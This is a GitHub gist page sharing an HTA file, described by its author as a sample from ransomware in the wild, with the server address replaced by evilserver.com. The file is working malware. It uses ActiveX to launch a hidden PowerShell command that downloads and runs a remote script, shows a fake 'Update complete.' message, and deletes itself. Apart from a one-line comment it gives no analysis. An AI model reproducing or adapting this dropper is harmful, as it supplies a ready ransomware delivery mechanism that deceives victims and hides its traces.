Skip to content

Instantly share code, notes, and snippets.

@cmbaughman

cmbaughman/MalwareInjectExample.hta

Created June 13, 2019 00:01
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save cmbaughman/a29edaa5f1b842a8991935a267f57acb to your computer and use it in GitHub Desktop.
Save cmbaughman/a29edaa5f1b842a8991935a267f57acb to your computer and use it in GitHub Desktop.
Download ZIP
Malware by HTA (MSHTML)
Raw
MalwareInjectExample.hta
<HTML>
<HEAD>
<script>
try {
a=new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -nop -noe $d=$env:temp+'\\4c2187acf5b34b9e97b6c675b7efba92.ps1';(New-Object System.Net.WebClient).DownloadFile('http://evilserver.com',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p);
} catch (e) {}
close();
</script>
</HEAD>
<BODY>
</BODY>
</HTML>
@cmbaughman
Copy link
Author

Fun sample from a ransomware currently in the wild. Replaced the ransomware server address with evilserver.com

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment